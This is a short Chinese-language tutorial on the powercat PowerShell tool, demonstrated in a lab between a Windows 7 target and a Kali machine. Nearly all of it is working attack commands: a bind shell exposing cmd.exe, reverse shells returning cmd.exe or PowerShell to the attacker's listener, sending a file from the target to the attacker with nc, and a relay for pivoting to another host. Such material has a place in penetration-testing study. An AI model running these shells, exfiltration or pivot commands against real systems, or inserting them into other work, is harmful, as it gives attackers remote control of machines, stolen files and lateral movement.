项目地址:https://github.com/besimorhino/powercat.git
powercat与netcat的命令功能非常相似,可以相互连接。其中powercat可以返回powershell,而netcat不支持。
导入powercat:
powershell #进入powershell命令行 Set-ExecutionPolicy RemoteSigned #设置允许执行本地powershell脚本 Import-Module ./powercat.ps1 powercat -h
nc正向连接PowerCat:
在win7上执行命令,开始监听:
powercat -l -p 4444 -e cmd.exe -v
在kali上执行命令,连接win7端口获得cmd命令行:nc 192.168.83.91 4444 -vv
nc反向连接PowerCat:
在kali上执行命令监听:
nc -l -p 4444 -vv
在win7中执行命令:powercat -c 192.168.83.100 -p 4444 -v -e cmd.exe
通过PowerCat反弹PowerShell:
在kali上执行命令监听:nc -l -p 4444 -vv开始监听
在win7中执行命令:powercat -c 192.168.83.100 -p 4444 -v -ep
通过PowerCat与nc传输文件:
在kali上执行命令监听:nc -l -p 4444 > test.txt开始监听,并把传输的内容写入到test.txt中
在win7中执行命令:powercat -c 192.168.83.100 -p 4444 -i C:\powercat-master\README.md -v
netcat没有任何显示,但已经传输成功
使用PowerCat作为跳板:
靶机监听:powercat -l -v -p 6666 -e cmd.exe
跳板机监听:powercat -l -v -p 4444 -r tcp:192.168.83.91:6666
这样,当访问跳板机的4444端口时,就会把流量转发给靶机(192.168.83.91)的6666端口中了
